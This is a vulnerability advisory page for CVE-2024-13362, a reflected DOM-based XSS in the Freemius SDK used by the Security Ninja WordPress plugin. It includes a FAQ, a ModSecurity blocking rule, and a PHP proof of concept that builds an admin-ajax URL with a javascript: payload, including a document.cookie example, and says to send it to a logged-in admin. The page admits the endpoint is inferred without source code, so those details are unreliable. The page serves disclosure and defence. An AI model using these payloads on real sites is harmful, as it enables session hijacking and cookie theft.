What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK library. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when the ‘url’ parameter is processed by the Freemius SDK without proper sanitization, allowing attackers to craft malicious URLs. When a user clicks such a link, the injected script executes in their browser, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. This includes various plugins and themes that incorporate the Freemius SDK, such as the Security Ninja plugin version 5.222.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Freemius SDK used by your plugins and themes. If it is version 2.10.1 or earlier, your site is vulnerable and should be updated immediately.

How can I fix or mitigate this issue?

The best course of action is to update the Freemius SDK to the latest version where the vulnerability is patched. Additionally, ensure that any user-supplied input is properly sanitized and escaped before being used in the DOM.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires user interaction, the potential impact on the site and its users can be significant, including data theft and unauthorized actions.

What is reflected DOM-based XSS?

Reflected DOM-based XSS is a type of attack where the injected script is executed in the user’s browser as a result of clicking a malicious link. The attack payload is not sent to the server but is reflected back to the user through the client-side code.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to various risks, including session hijacking, theft of authentication cookies, and redirection to malicious sites. Although user interaction is needed, the consequences can still be severe.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a malicious URL that exploits the vulnerability. It shows how the ‘url’ parameter can be manipulated to execute arbitrary JavaScript in the context of the victim’s browser.

What should I do if I cannot update immediately?

If an immediate update is not possible, consider disabling the affected plugins or themes until a patch can be applied. Additionally, educate users about the risks of clicking on unknown links to mitigate potential exploitation.

Are there any tools to help identify this vulnerability?

Yes, various security plugins for WordPress can help identify vulnerabilities, including this one. Tools like Wordfence and Sucuri can scan your site for known vulnerabilities and provide guidance on remediation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 7, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (security-ninja)

CVE ID CVE-2024-13362

Plugin security-ninja

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 5.222

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK library (versions <= 2.10.1) used by multiple WordPress plugins and themes, including the Security Ninja plugin (vulnerable version 5.222). The vulnerability has a CVSS score of 6.1 (Medium) with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, indicating network exploitation with low complexity, no privileges required, but user interaction is necessary.

The root cause of this vulnerability is improper neutralization of user-supplied input within the 'url' parameter, likely in a JavaScript context that manipulates the DOM directly. Based on the CWE-79 classification and description, the plugin or Freemius SDK receives a 'url' parameter, fails to sanitize it properly, and injects it into the page without HTML or JavaScript context escaping. Since Atomic Edge analysis is metadata-based without access to source code, we infer that the vulnerable code resides in a JavaScript file that reads from a query string or POST parameter and writes it into the DOM (e.g., via innerHTML or document.write). This is consistent with DOM-based XSS, where the attack payload never reaches the server but executes in the client's browser.

Exploitation requires an unauthenticated attacker to craft a malicious link containing a JavaScript payload in the 'url' parameter. For example, an attacker could construct a URL like: https://target-site.com/wp-admin/admin-ajax.php?action=freemius_connect&url=javascript:alert(document.cookie) or similar. The Freemius SDK's JavaScript handler would then process this parameter and write it unsafely into the page. Since the vulnerability is reflected and DOM-based, the attacker must trick a user into clicking the crafted link. The attack can bypass traditional server-side XSS filters because the payload is never sent to the server for processing; it is only reflected through the client-side URL fragment or query string.

Remediation likely requires the vendor to apply proper output encoding when inserting the 'url' parameter into the DOM. Since the vulnerability is in client-side JavaScript, the fix should use textContent or safer DOM manipulation methods instead of innerHTML, or apply JavaScript encoding (e.g., encodeURIComponent) before inserting user-controlled data into the page. Server-side, the parameter should be sanitized with a URL validation function (e.g., filter_var with FILTER_VALIDATE_URL) and output-escaped using WordPress's esc_url or esc_js functions before being passed to JavaScript.

If exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim's browser on the affected WordPress site. This can lead to session hijacking, theft of authentication cookies, defacement of the page, or redirection to malicious sites. The impact is limited by the requirement for user interaction (clicking a link), but the scope change in CVSS (S:C) indicates the injected script can affect resources beyond the vulnerable component. Atomic Edge research confirms that this is a medium-severity issue that should be patched promptly.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# This rule blocks reflected DOM-based XSS attempts targeting the Freemius SDK's 'url' parameter.
# The rule matches the exact endpoint and parameter name to minimize false positives.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via Freemius url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
    SecRule ARGS_GET:action "@streq freemius_connect" "chain"
        SecRule ARGS_GET:url "@rx (?:javascript|data|vbscript|on[a-z]+)" 
            "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates how an attacker could craft a malicious URL that, when visited by a victim,
// triggers DOM-based XSS in the Freemius SDK's handling of the 'url' parameter.
// Since no source code is available, the endpoint is inferred from common Freemius patterns.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

$payload = 'javascript:alert('XSS_by_Atomic_Edge')';

// Construct the malicious URL. The endpoint /wp-admin/admin-ajax.php with action 'freemius_connect'
// is a common Freemius handler. The 'url' parameter is injected into the DOM.
$exploit_url = sprintf(
    '%s/wp-admin/admin-ajax.php?action=freemius_connect&url=%s',
    rtrim($target_url, '/'),
    urlencode($payload)
);

echo "[+] Atomic Edge CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Crafted exploit URL:n";
echo "$exploit_urlnn";
echo "[+] Instructions: Send this link to a logged-in admin. When clicked, the JavaScript alert will execute.n";
echo "[!] Note: Actual exploitation depends on the presence of the Freemius SDK and the specific vulnerable handler.n";

// Optionally, use cURL to simulate a request to verify the parameter is reflected (for server-side reflection)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Server response HTTP code: $http_coden";
if ($http_code == 200) {
    echo "[+] Request succeeded. Check if the 'url' parameter is reflected in the response (for server-side reflection).n";
} else {
    echo "[!] Unexpected response code. The endpoint may differ.n";
}
?>

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK library. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the ‘url’ parameter is processed by the Freemius SDK without proper sanitization, allowing attackers to craft malicious URLs. When a user clicks such a link, the injected script executes in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. This includes various plugins and themes that incorporate the Freemius SDK, such as the Security Ninja plugin version 5.222.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check for vulnerability, verify the version of the Freemius SDK used by your plugins and themes. If it is version 2.10.1 or earlier, your site is vulnerable and should be updated immediately.
How can I fix or mitigate this issue?
Recommended remediation steps
The best course of action is to update the Freemius SDK to the latest version where the vulnerability is patched. Additionally, ensure that any user-supplied input is properly sanitized and escaped before being used in the DOM.
What does the CVSS score of 6.1 mean?
Understanding the severity rating
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while exploitation requires user interaction, the potential impact on the site and its users can be significant, including data theft and unauthorized actions.
What is reflected DOM-based XSS?
Defining the attack type
Reflected DOM-based XSS is a type of attack where the injected script is executed in the user’s browser as a result of clicking a malicious link. The attack payload is not sent to the server but is reflected back to the user through the client-side code.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to various risks, including session hijacking, theft of authentication cookies, and redirection to malicious sites. Although user interaction is needed, the consequences can still be severe.
How does the proof of concept demonstrate the issue?
Explaining the PoC
The proof of concept illustrates how an attacker can craft a malicious URL that exploits the vulnerability. It shows how the ‘url’ parameter can be manipulated to execute arbitrary JavaScript in the context of the victim’s browser.
What should I do if I cannot update immediately?
Interim measures to consider
If an immediate update is not possible, consider disabling the affected plugins or themes until a patch can be applied. Additionally, educate users about the risks of clicking on unknown links to mitigate potential exploitation.
Are there any tools to help identify this vulnerability?
Using security tools for assessment
Yes, various security plugins for WordPress can help identify vulnerabilities, including this one. Tools like Wordfence and Sucuri can scan your site for known vulnerabilities and provide guidance on remediation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations